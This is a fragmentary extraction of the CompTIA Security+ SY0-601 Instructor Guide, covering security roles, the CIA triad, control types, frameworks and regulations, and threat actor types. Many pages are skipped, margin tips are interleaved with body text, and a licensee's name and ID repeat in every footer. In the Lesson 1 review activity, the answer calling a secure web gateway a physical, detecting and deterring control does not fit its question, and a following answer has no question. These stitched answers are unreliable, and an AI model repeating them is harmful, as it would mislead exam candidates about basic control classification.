CompTIA Security Instructor Guide SY0601
CompTIA Security Instructor Guide SY0601
CompTIA
Security+
Instructor Guide
(Exam SY0-601)
Course Edition: 1.0
Acknowledgments
Notices
Disclaimer
While CompTIA, Inc., takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy,
and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of
merchantability or fitness for a particular purpose. The use of screenshots, photographs of another entity's products, or
another entity's product name or service in this book is for editorial purposes only. No such use should be construed to imply
sponsorship or endorsement of the book by nor any affiliation of such entity with CompTIA. This courseware may contain links
to sites on the Internet that are owned and operated by third parties (the "External Sites"). CompTIA is not responsible for
the availability of, or the content located on or through, any External Site. Please contact CompTIA if you have any concerns
regarding such links or External Sites.
Trademark Notice
CompTIA®, Security+®, and the CompTIA logo are registered trademarks of CompTIA, Inc., in the U.S. and other countries.
All other product and service names used may be common law or registered trademarks of their respective proprietors.
Copyright Notice
Copyright © 2020 CompTIA, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software
proprietor. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed
in any form or by any means, or stored in a database or retrieval system, without the prior written permission of CompTIA,
3500 Lacey Road, Suite 100, Downers Grove, IL 60515-5439.
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software
or other products is the responsibility of the user according to terms and conditions of the owner. If you believe that this
book, related materials, or any other CompTIA materials are being reproduced or transmitted without permission, please call
1-866-835-8020 or visit https://help.comptia.org.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Table of Contents | iii
Table of Contents
Topic 1B: Compare and Contrast Security Control and Framework Types...... 8
Table of Contents
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
iv | Table of Contents
Table of Contents
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Table of Contents | v
Topic 17B: Utilize Appropriate Data Sources for Incident Response............ 465
Topic 18B: Explain Key Aspects of Digital Forensics Evidence Acquisition..... 490
Table of Contents
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
vi | Table of Contents
Topic 21A: Explain the Importance of Physical Site Security Controls......... 540
Topic 21B: Explain the Importance of Physical Host Security Controls........ 548
Glossary...........................................................................................................................G-1
Table of Contents
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Using The Official CompTIA Security+
Instructor Guide (Exam SY0-601)
WELCOME TO THE INSTRUCTOR
The Official CompTIA Security+ Instructor and Student Guides (Exam SY0-601) have
been developed by CompTIA for the CompTIA certification candidate. Rigorously
evaluated by third-party subject matter experts to validate adequate coverage of the
Security+ exam objectives, The Official CompTIA Security+ Instructor and Student Guides
teach students the knowledge and skills required to assess the security posture of
an enterprise environment and recommend and implement appropriate security
solutions; monitor and secure hybrid environments, including cloud, mobile, and IoT;
operate with an awareness of applicable laws and policies, including principles of
governance, risk, and compliance; identify, analyze, and respond to security events and
incidents; and prepare candidates to take the CompTIA Security+ certification exam.
The Official CompTIA Security+ Guides are created around several core principles
including:
• Support the Modern Learner—The Official CompTIA Security+ Guides are
designed with the modern student and classroom in mind, ensuring success
whether the course format is co-located or remote, synchronous or asynchronous,
continuous or modular. Instructors will find best practices and recommendations
within the margin of their Instructor Guide specific to the various course formats.
Preparing to Teach
The course covers the following themes:
• Threat intelligence and security assessment (Lessons 1-4).
In addition, incident response has been expanded and moved toward the end of the
course. In addition, physical/site security is now covered at the end of the course.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
viii | Instructor Preface
• Reworked Presentation Tools: The number of PowerPoint lecture slides has been
vastly reduced as compared with SY0-501, while supporting PowerPoint notes and
Presentation Planners have been enhanced, making it easier for instructors to plan
lectures and use classroom time effectively.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Instructor Preface | ix
CertMaster Labs
CertMaster Labs allow students to learn in actual software applications through a
remote lab environment. The labs align with The Official CompTIA Instructor and Student
Guides and allow students to practice what they are learning using real, hands-on
experiences. All lab activities include gradable assessments, offer feedback and hints,
and provide a score based on learner inputs. Students have access to the software
environment for 12 months after they redeem their access key, providing a fantastic
resource for students to practice their skills. Features of CertMaster Labs include:
• Browser-based – The labs can be accessed with a browser and internet connection,
making the setup process easy and enabling remote students to use the materials
without having to secure any special equipment or software.
• Use Real Equipment and Software – The labs use virtual machines configured
with actual software applications and operating systems allowing for flexibility in
approaching the lab tasks and replicating the experience students will encounter in
a job role.
• Graded Labs – Lab activities will more accurately assess a student’s ability to
perform tasks (because they will get a score on their work) and will surface that
information to instructors.
• Modular – The labs within each course are independent of each other and can be
used in any order.
• Designed for Skills Development – The labs help students gain experience
with the practical tasks that will be expected of them in a job role and on the
performance-based items found on CompTIA certification exams.
• Aligned with Official CompTIA Content – The labs are based on the content within
The Official CompTIA Instructor and Student Guides, providing a consistent and
seamless experience for students to both gain knowledge and practice skills
• Ability to Save Work – Students can save their work in labs for 48 hours to allow
for more flexibility in how labs are implemented in coursework.
Lab Activities
Hands-on activities have been redesigned to take advantage of the virtual environment.
All lab activities include gradable assessments, offer feedback and hints, and provide a
score based on learner inputs. There are two types of labs:
• Assisted Labs provide detailed steps with graded assessment and feedback for the
completion of each task. These labs are shorter, focus on a specific task and typically
take 10-15 minutes to complete.
• Applied Labs are longer activities that provide a series of goal-oriented scenarios
with graded assessment and feedback based on a learner’s ability to complete each
goal successfully. Applied labs are typically 30-45 minutes long and cover multiple
tasks a student has learned over the course of several lessons.
Find more information about CertMaster Labs and how to purchase them at
store.comptia.org.
Presentation Planners
Within the instructional design hierarchy, the course structure tries to follow the
exam objectives domain structure as far as possible, but some objectives and content
examples are split between multiple lessons and topics so as to make the topics flow
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
x | Instructor Preface
• Ask participants to preread some of the content as "homework" to reduce class time
spent on that topic.
• Summarize a topic in overview, and then answer questions during a later session
when students have had a chance to study it in more detail.
If students are struggling with lab activities, consider some of the following approaches:
• Demonstrate a lab as a walkthrough.
• Get students to partner up to complete a lab, with one student completing the steps
and the other student advising and checking.
• Summarize the remaining parts of a lab if students do not have time to finish in
class.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
About This Course
CompTIA is a not-for-profit trade association with the purpose of advancing the Teaching
interests of IT professionals and IT channel organizations and its industry-leading IT Tip
certifications are an important part of that mission. CompTIA's Security+ certification is Take some time at the
a foundation-level certificate designed for IT administrators with two years' experience start of the course for
whose job role is focused on system security. students to introduce
themselves and
The CompTIA Security+ exam will certify the successful candidate has the knowledge identify the outcomes
and skills required to assist with cybersecurity duties in small and large organizations. they hope to achieve
These duties include assessments and monitoring; secure network, host, app, and by studying the
cloud provisioning; data governance; and incident analysis and response. course.
Course Description
Course Objectives
This course can benefit you in two ways. If you intend to pass the CompTIA Security+
(Exam SY0-601) certification examination, this course can be a significant part of your
preparation. But certification is not the only key to professional success in the field of
computer security. Today's job market demands individuals with demonstrable skills,
and the information and activities in this course can help you build your cybersecurity
skill set so that you can confidently perform your duties in any entry-level security role.
On course completion, you will be able to:
• Compare security roles and security controls
• Perform security assessments and identify social engineering attacks and malware
types
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
xii | Preface
Target Student
The Official CompTIA Security+ Guide (Exam SY0-601) is the primary course you will need
to take if your job responsibilities include securing network services, devices, and data
confidentiality/privacy in your organization. You can take this course to prepare for the
CompTIA Security+ (Exam SY0-601) certification examination.
Prerequisites
• To ensure your success in this course, you should have basic Windows and Linux
administrator skills and the ability to implement fundamental networking appliances
and IP addressing concepts. CompTIA A+ and Network+ certifications, or equivalent
knowledge, and six to nine months' experience in networking, including configuring
security parameters, are strongly recommended.
The prerequisites for this course might differ significantly from the prerequisites for
the CompTIA certification exams. For the most up-to-date information about the exam
prerequisites, complete the form on this page: comptia.org/training/resources/exam-
objectives
As You Learn
At the top level, this course is divided into lessons, each representing an area of
competency within the target job roles. Each lesson is composed of a number of topics.
A topic contains subjects that are related to a discrete job task, mapped to objectives
and content examples in the CompTIA exam objectives document. Rather than follow
the exam domains and objectives sequence, lessons and topics are arranged in order
of increasing proficiency. Each topic is intended to be studied within a short period
(typically 30 minutes at most). Each topic is concluded by one or more activities,
designed to help you to apply your understanding of the study notes to practical
scenarios and tasks.
Additional to the study content in the lessons, there is a glossary of the terms and
concepts used throughout the course. There is also an index to assist in locating
particular terminology, concepts, technologies, and tasks within the lesson and topic
content.
In many electronic versions of the book, you can click links on key words in the topic content
to move to the associated glossary definition, and on page references in the index to move
to that term in the content. To return to the previous location in the document after clicking
a link, use the appropriate functionality in your eBook viewing software.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Preface | xiii
A Caution note makes you aware of places where you need to be par-
ticularly careful with your actions, settings, or decisions so that you can
be sure to get the desired results of an activity or task.
As You Review
Any method of instruction is only as effective as the time and effort you, the student,
are willing to invest in it. In addition, some of the information that you learn in class
may not be important to you immediately, but it may become important later. For this
reason, we encourage you to spend some time reviewing the content of the course
after your time in the classroom.
Following the lesson content, you will find a table mapping the lessons and topics to
the exam domains, objectives, and content examples. You can use this as a checklist as
you prepare to take the exam, and review any content that you are uncertain about.
As a Reference
The organization and layout of this book make it an easy-to-use resource for future
reference. Guidelines can be used during class and as after-class references when
you're back on the job and need to refresh your understanding. Taking advantage of
the glossary, index, and table of contents, you can use this book as a first source of
definitions, background information, and summaries.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 1
Comparing Security Roles and
Security Controls
Lesson Objectives
In this lesson, you will:
• Compare and contrast information security roles.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
2 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 1A
Compare and Contrast Information
Security Roles
Teaching EXAM OBJECTIVES COVERED
Tip This topic provides background information about the role of security professionals and
This topic introduces does not cover a specific exam objective.
the concept of
the CIA triad and
discusses roles and To be successful and credible as a security professional, you should understand
responsibilities in security in business starting from the ground up. You should also know the key security
typical information terms and ideas used by other security experts in technical documents and in trade
security teams. This
publications. Security implementations are constructed from fundamental building
topic does not align
to specific objectives, blocks, just like a large building is constructed from individual bricks. This topic will help
but it does cover you understand those building blocks so that you can use them as the foundation for
some terminology your security career.
from the acronyms
list. You can skip this
topic if students are Information Security
familiar with these
basic concepts and Information security (or infosec) refers to the protection of data resources from
terminology and you unauthorized access, attack, theft, or damage. Data may be vulnerable because of
would prefer to move the way it is stored, the way it is transferred, or the way it is processed. The systems
quickly to covering used to store, transmit, and process data must demonstrate the properties of security.
syllabus content.
Secure information has three properties, often referred to as the CIA Triad:
Show Slide(s) • Confidentiality means that certain information should only be known to certain
people.
Information Security
• Integrity means that the data is stored and transferred as intended and that any
Teaching modification is authorized.
Tip
• Availability means that information is accessible to those authorized to view or
Make sure that
students can
modify it.
differentiate the
goals of providing
The triad can also be referred to as "AIC" to avoid confusion with the Central Intelligence
confidentiality,
integrity, and
Agency.
availability (and non-
repudiation). Note
that the property of
availability should not Some security models and researchers identify other properties that secure systems
be overlooked. should exhibit. The most important of these is non-repudiation. Non-repudiation
An alternative means that a subject cannot deny doing something, such as creating, modifying, or
acronym is sending a resource. For example, a legal document, such as a will, must usually be
PAIN (Privacy, witnessed when it is signed. If there is a dispute about whether the document was
Authentication, correctly executed, the witness can provide evidence that it was.
Integrity, Non-
Repudiation). We will
discuss security versus
privacy later in the
course.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 3
Within the goal of ensuring information security, cybersecurity refers specifically Cybersecurity
to provisioning secure processing hardware and software. Information security Framework
and cybersecurity tasks can be classified as five functions, following the framework
developed by the National Institute of Standards and Technology (NIST) (nist.gov/ Teaching
cyberframework/online-learning/five-functions): Tip
Use these functions
• Identify—develop security policies and capabilities. Evaluate risks, threats, and
to give students
vulnerabilities and recommend security controls to mitigate them. an overview of
typical cybersecurity
• Protect—procure/develop, install, operate, and decommission IT hardware and operations.
software assets with security as an embedded requirement of every stage of this Make sure students
operations life cycle. are familiar with the
work of NIST. Note
• Detect—perform ongoing, proactive monitoring to ensure that controls are effective also that links in the
and capable of protecting against new types of threats. course will often
include sites and
• Respond—identify, analyze, contain, and eradicate threats to systems and data white papers with
security. considerable amounts
of additional detail.
• Recover—implement cybersecurity resilience to restore systems and data if other This detail is not
controls are unable to prevent attacks. necessary to learn for
the exam.
Start to develop
the idea that
cybersecurity is
adversarial in nature,
with threat actors
continually seeking
new advantages over
defensive systems.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
4 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Monitor audit logs, review user privileges, and document access controls.
• Create and test business continuity and disaster recovery plans and procedures.
However, the goals of a network manager are not always well-aligned with the
goals of security; network management focuses on availability over confidentiality.
Consequently, security is increasingly thought of as a dedicated function or business
unit with its own management structure.
• Managers may have responsibility for a domain, such as building control, ICT, or
accounting.
• Technical and specialist staff have responsibility for implementing, maintaining, and
monitoring the policy. Security might be made a core competency of systems and
network administrators, or there may be dedicated security administrators. One
such job title is Information Systems Security Officer (ISSO).
• Non-technical staff have the responsibility of complying with policy and with any
relevant legislation.
• External responsibility for security (due care or liability) lies mainly with directors
or owners, though again it is important to note that all employees share some
measure of responsibility.
NIST's National Initiative for Cybersecurity Education (NICE) categorizes job tasks and job
roles within the cybersecurity industry (gov/itl/applied-cybersecurity/nice/nice-framework-
resource-center).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 5
The following units are ofen used to represent the security function within the Information Security
organizational hierarchy. Business Units
Interaction
Opportunity
If appropriate,
discuss how the
security function is
represented in the
students' workplaces.
Do any students
currently work in a
SOC or participate in
DevSecOps projects?
DevSecOps
Network operations and use of cloud computing make ever-increasing use of
automation through software code. Traditionally, software code would be the
responsibility of a programming or development team. Separate development and
operations departments or teams can lead to silos, where each team does not work
effectively with the other.
Development and operations (DevOps) is a cultural shift within an organization to
encourage much more collaboration between developers and system administrators.
By creating a highly orchestrated environment, IT personnel and developers can build,
test, and release software faster and more reliably. Many consider a DevOps approach
to administration as the only way organizations can take full advantage of the potential
benefits offered by cloud service providers.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
6 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Incident Response
A dedicated cyber incident response team (CIRT)/computer security incident
response team (CSIRT)/computer emergency response team (CERT) as a single point-of-
contact for the notification of security incidents. This function might be handled by the
SOC or it might be established as an independent business unit.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 7
Review Activity:
Information Security Roles
Teaching
Answer the following questions:
Tip
You can either
complete the review
questions in class with
1. What are the properties of a secure information processing system? the students or simply
make them aware of
Confidentiality, Integrity, and Availability (and Non-repudiation). them as resources to
use as they review the
2. What term is used to describe the property of a secure network where a course material before
sender cannot deny having sent a message? the exam.
Non-repudiation.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
8 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 1B
Compare and Contrast Security Control
and Framework Types
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 9
Although it uses a more complex scheme, it is worth being aware of the way the National
Institute of Standards and Technology (NIST) classifies security controls (nvlpubs.nist.gov/
nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf). Show Slide(s)
Security Control
Security Control Functional Types Functional Types (2)
Security controls can also be classified in types according to the goal or function they Teaching
perform: Tip
Where the category
• Preventive—the control acts to eliminate or reduce the likelihood that an attack can describes the
succeed. A preventative control operates before an attack can take place. Access implementation type,
control lists (ACL) configured on firewalls and file system objects are preventative- a functional type
type controls. Anti-malware software also acts as a preventative control, by blocking describes what the
control is deployed
processes identified as malicious from executing. Directives and standard operating
to do.
procedures (SOPs) can be thought of as administrative versions of preventative
controls. Interaction
Opportunity
• Detective—the control may not prevent or deter access, but it will identify and
record any attempted or successful intrusion. A detective control operates during Get the students to
nominate examples
the progress of an attack. Logs provide one of the best examples of detective-type of different types of
controls. controls:
• Preventive—
• Corrective—the control acts to eliminate or reduce the impact of an intrusion
permissions policy,
event. A corrective control is used after an attack. A good example is a backup encryption, firewall,
system that can restore data that was damaged during an intrusion. Another barriers, locks
example is a patch management system that acts to eliminate the vulnerability • Detective—alarms,
exploited during the attack. monitoring, file
verification
While most controls can be classed functionally as preventative, detective, or • Corrective—incident
corrective, a few other types can be used to define other cases: response policies,
data backup, patch
• Physical—Controls such as alarms, gateways, locks, lighting, security cameras, and management
guards that deter and detect access to premises and hardware are often classed
separately.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
10 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 11
NIST's Risk Management Framework (RMF) pre-dates the CSF. Where the CSF focuses
on practical cybersecurity for businesses, the RMF is more prescriptive and principally
intended for use by federal agencies (csrc.nist.gov/projects/risk-management/rmf-
overview).
As well as its cybersecurity and risk frameworks, NIST is responsible for issuing the
Federal Information Processing Standards (FIPS) plus advisory guides called Special
Publications (csrc.nist.gov/publications/sp). Many of the standards and technologies
covered in CompTIA Security+ are discussed in these documents.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
12 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
(AICPA). These audits are designed to assure consumers that service providers—
notably cloud providers, but including any type of hosted or third-party service—
meet professional standards (aicpa.org/interestareas/frc/assuranceadvisoryservices/
serviceorganization-smanagement.html). Within SSAE No. 18 (the current specification),
there are several levels of reporting:
• Service Organization Control (SOC2)— evaluates the internal controls implemented
by the service provider to ensure compliance with Trust Services Criteria (TSC) when
storing and processing customer data. TSC refers to security, confidentiality, integrity,
availability, and privacy properties. An SOC2 Type I report assesses the system design,
while a Type II report assesses the ongoing effectiveness of the security architecture
over a period of 6-12 months. SOC2 reports are highly detailed and designed to
be restricted. They should only be shared with the auditor and regulators and with
important partners under non disclosure agreement (NDA) terms.
• SOC3—a less detailed report certifying compliance with SOC2. SOC3 reports can be
freely distributed.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 13
• National Checklist Program (NCP) by NIST provides checklists and benchmarks for a
variety of operating systems and applications (nvd.nist.gov/ncp/repository).
Application Servers
Most application architectures use a client/server model. This means that part of the
application is a client software program, installed and run on separate hardware to
the server application code. The client interacts with the server over a network. Attacks
can therefore be directed at the local client code, at the server application, or at the
network channel between them. As well as coding issues, the applications need to take
account of platform issues. The client application might be running in a computing host
alongside other, potentially malicious, software. Code that runs on the client should
not be trusted. The server-side code should implement routines to verify that input
conforms to what is expected.
The key frameworks, benchmarks, and configuration guides may be used to Regulations,
demonstrate compliance with a country's legal/regulatory requirements or with Standards, and
industry-specific regulations. Due diligence is a legal term meaning that responsible Legislation
persons have not been negligent in discharging their duties. Negligence may create
criminal and civil liabilities. Many countries have enacted legislation that criminalizes Teaching
negligence in information management. In the US, for example, the Sarbanes-Oxley Tip
Act (SOX) mandates the implementation of risk assessments, internal controls, and The syllabus does not
audit procedures. The Computer Security Act (1987) requires federal agencies to list specific examples
develop security policies for computer systems that process confidential information. of legislation, so these
are illustrative rather
In 2002, the Federal Information Security Management Act (FISMA) was introduced to
than comprehensive.
govern the security of data processed by federal government agencies. Students should focus
on the fact that there
Some regulations have specific cybersecurity control requirements; others simply mandate can be many different
"best practice," as represented by a particular industry or international framework. It may sources of compliance
be necessary to perform mapping between different industry frameworks, such as NIST requirements.
and ISO 27K, if a regulator specifies the use of one but not another. Conversely, the use of Note the difference
frameworks may not be mandated as such, but auditors are likely to expect them to be in between vertical
place as a demonstration of a strong and competent security program. (sector-specific) and
horizontal (consumer-
specific, cross-sector)
Personal Data and the General Data Protection Regulation (GDPR) legislation.
Where some types of legislation address cybersecurity due diligence, others focus in
whole or in part on information security as it affects privacy or personal data. Privacy
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
14 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
is a distinct concept from security. Privacy requires that collection and processing
of personal information be both secure and fair. Fairness and the right to privacy,
as enacted by regulations such as the European Union's General Data Protection
Regulation (GDPR), means that personal data cannot be collected, processed, or
retained without the individual's informed consent. Informed consent means that the
data must be collected and processed only for the stated purpose, and that purpose
must be clearly described to the user in plain language, not legalese. GDPR (ico.org.
uk/for-organisations/guide-to-data-protection/guide-to-the-general-data-protection-
regulation-gdpr) gives data subjects rights to withdraw consent, and to inspect, amend,
or erase data held about them.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 15
Review Activity:
Security Control and Framework Types
Answer the following questions:
1. You have implemented a secure web gateway that blocks access to a social
networking site. How would you categorize this type of security control?
It would be classed as a physical control and its function is both detecting and
deterring.
That the control is enforced by a a person rather than a technical system, and that
the control has been developed to replicate the functionality of a primary control, as
required by a security standard.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
16 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 1
Summary
Teaching You should be able to compare and contrast security controls using categories and
Tip functional types. You should also be able to explain how regulations, frameworks, and
Check that students
benchmarks are used to develop and validate security policies and control selection.
are confident about
the content that has
been covered. If there
Guidelines for Comparing Security Roles and
is time, revisit any Security Controls
content examples that
they have questions Follow these guidelines when you assess the use of security controls, frameworks, and
about. If you have benchmarks in your organization:
used all the available
time for this lesson • Create a security mission statement and supporting policies that emphasizes the
block, note the issues, importance of the CIA triad: confidentiality, integrity, availability.
and schedule time for
a review later in the • Assign roles so that security tasks and responsibilities are clearly understood and
course. that impacts to security are assessed and mitigated across the organization.
Interaction
• Consider creating business units, departments, or projects to support the security
Opportunity
function, such as a SOC, CSIRT, and DevSecOps.
Optionally, discuss
with students how • Identify and assess the laws and industry regulations that impose compliance
the concepts from requirements on your business.
this lesson could be
used within their own • Select a framework that meets compliance requirements and business needs.
workplaces, or how
these principles are • Create a matrix of security controls that are currently in place to identify categories
already being put into
and functions—consider deploying additional controls for any unmatched
practice.
capabilities.
• Evaluate security capabilities against framework tiers and identify goals for
developing additional cybersecurity competencies and improving overall
information security assurance.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 2
Explaining Threat Actors and
Threat Intelligence
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
18 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 2A
Explain Threat Actor Types and
Attack Vectors
• Risk is the likelihood and impact (or consequence) of a threat actor exploiting
a vulnerability. To assess risk, you identify a vulnerability and then evaluate the
likelihood of it being exploited by a threat and the impact that a successful exploit
would have.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 19
These definitions and more information on risk management are contained in NIST's SP
800-30 (nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-30r1.pdf).
Historically, cybersecurity techniques were highly dependent on the identification Attributes of Threat
of "static" known threats, such as viruses or rootkits, Trojans, botnets, and specific Actors
software vulnerabilities. It is relatively straightforward to identify and scan for these
types of threats with automated software. Unfortunately, adversaries were able to Teaching
develop means of circumventing this type of signature-based scanning. Tip
Note that the detailed
The sophisticated nature of modern cybersecurity threats means that it is important
process of analyzing
to be able to describe and analyze behaviors. This analysis involves identifying the the threat posed by
attributes of threat actors in terms of location, intent, and capability. a particular actor or
adversary group is
Internal/External described as threat
modeling. Discuss
An external threat actor or agent is one that has no account or authorized access how threat sources
to the target system. A malicious external threat must infiltrate the security system and motivations
using malware and/or social engineering. Note that an external actor may perpetrate change over time.
For example,
an attack remotely or on-premises (by breaking into the company's headquarters, Internet threats have
for instance). It is the threat actor that is defined as external, rather than the changed from being
attack method. mostly opportunistic
vandalism to
Conversely, an internal (or insider) threat actor is one that has been granted structured threats
permissions on the system. This typically means an employee, but insider threat can associated with
also arise from contractors and business partners. organized crime and
state-backed groups.
Intent/Motivation
Intent describes what an attacker hopes to achieve from the attack, while motivation
is the attacker's reason for perpetrating the attack. A malicious threat actor could
be motivated by greed, curiosity, or some sort of grievance, for instance. The intent
could be to vandalize and disrupt a system or to steal something. Threats can be
characterized as structured or unstructured (or targeted versus opportunistic)
depending on the degree to which your own organization is targeted specifically. For
example, a criminal gang attempting to steal customers' financial data is a structured,
targeted threat; a script kiddie launching some variant on the "I Love You" email worm
is an unstructured, opportunistic threat.
Malicious intents and motivations can be contrasted with accidental or unintentional
threat actors and agents. Unintentional threat actors represents accidents, oversights,
and other mistakes.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
20 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Script Kiddies
Show Slide(s)
A script kiddie is someone who uses hacker tools without necessarily understanding
State Actors and
how they work or having the ability to craft new attacks. Script kiddie attacks might
Advanced Persistent have no specific target or any reasonable goal other than gaining attention or proving
Threats technical abilities.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 21
Show Slide(s)
Criminal Syndicates
and Competitors
Teaching
Tip
SIM swap fraud is a
good illustration of
organized crime-type
activity (digitaltrends.
Researchers such as FireEye report on the activities of organized crime and nation state actors. com/mobile/sim-swap-
(Screenshot used with permission from fireeye.com.) fraud-explained).
The Garmin
State actors will work at arm's length from the national government, military, or ransomware incident
illustrates the blurred
security service that sponsors and protects them, maintaining "plausible deniability."
lines between
They are likely to pose as independent groups or even as hacktivists. They may wage criminal syndicates,
false flag campaigns that try to implicate other states (media.kasperskycontenthub. state groups, and
com/wp-content/uploads/sites/43/2019/11/20151759/KSB2019_APT-predictions-2020_ intent/motivation
web.pdf). (zdnet.com/article/
hacker-gang-behind-
garmin-attack-doesnt-
Criminal Syndicates and Competitors have-a-history-of-
stealing-user-data).
In many countries, cybercrime has overtaken physical crime both in terms of number
of incidents and losses. A criminal syndicate can operate across the Internet from
different jurisdictions than its victim, increasing the complexity of prosecution. Show Slide(s)
Syndicates will seek any opportunity for criminal profit, but typical activities are
financial fraud (both against individuals and companies) and extortion. Insider Threat Actors
Most competitor-driven espionage is thought to be pursued by state actors, but it is not Teaching
inconceivable that a rogue business might use cyber espionage against its competitors. Tip
Such attacks could aim at theft or at disrupting a competitor's business or damaging The Capital One
their reputation. Competitor attacks might be facilitated by employees who have (scmagazine.com/
recently changed companies and bring an element of insider knowledge with them. home/security-news/
capital-one-breach-
exposes-not-just-data-
Insider Threat Actors but-dangers-of-cloud-
misconfigurations)
Many threat actors operate externally from the networks they target. An external actor and Twitter (vice.com/
has to break into the system without having been granted any legitimate permissions. en_us/article/jgxd3d/
An insider threat arises from an actor who has been identified by the organization and twitter-insider-access-
granted some sort of access. Within this group of internal threats, you can distinguish panel-account-hacks-
biden-uber-bezos)
insiders with permanent privileges, such as employees, from insiders with temporary
breaches are good
privileges, such as contractors and guests. The Computer Emergency Response Team examples of insider
(CERT) at Carnegie Mellon University's definition of a malicious insider is: threat.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
22 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
There is the blurred case of former insiders, such as ex-employees now working at another
company or who have been dismissed and now harbor a grievance. These can be classified
as internal threats or treated as external threats with insider knowledge, and possibly some
residual permissions, if effective offboarding controls are not in place.
CERT identifies the main motivators for malicious insider threats as sabotage,
financial gain, and business advantage. Like external threats, insider threats can be
opportunistic or targeted. Again, the key point here is to identify likely motivations,
such as employees who might harbor grievances or those likely to perpetrate fraud.
An employee who plans and executes a campaign to modify invoices and divert funds
is launching a structured attack; an employee who tries to guess the password on
the salary database a couple of times, having noticed that the file is available on the
network, is perpetrating an opportunistic attack. You must also assess the possibility
that an insider threat may be working in collaboration with an external threat actor
or group.
Insider threats can be categorized as unintentional. An unintentional or inadvertent
insider threat is a vector for an external actor, or a separate—malicious—internal
actor to exploit, rather than a threat actor in its own right. Unintentional threats usually
arise from lack of awareness or from carelessness, such as users demonstrating poor
password management. Another example of unintentional insider threat is the concept
of shadow IT, where users purchase or introduce computer hardware or software to
the workplace without the sanction of the IT department and without going through a
procurement and security analysis process. The problem of shadow IT is exacerbated
by the proliferation of cloud services and mobile devices, which are easy for users to
obtain. Shadow IT creates a new unmonitored attack surface for malicious adversaries
to exploit.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 23
or smartphone. For some exploits, simply connecting the media may be sufficient to
run the malware. In many cases, the attacker may need the employee to open a file
in a vulnerable application or run a setup program.
• Email—the attacker sends a malicious file attachment via email, or via any other
communications system that allows attachments. The attacker needs to use social
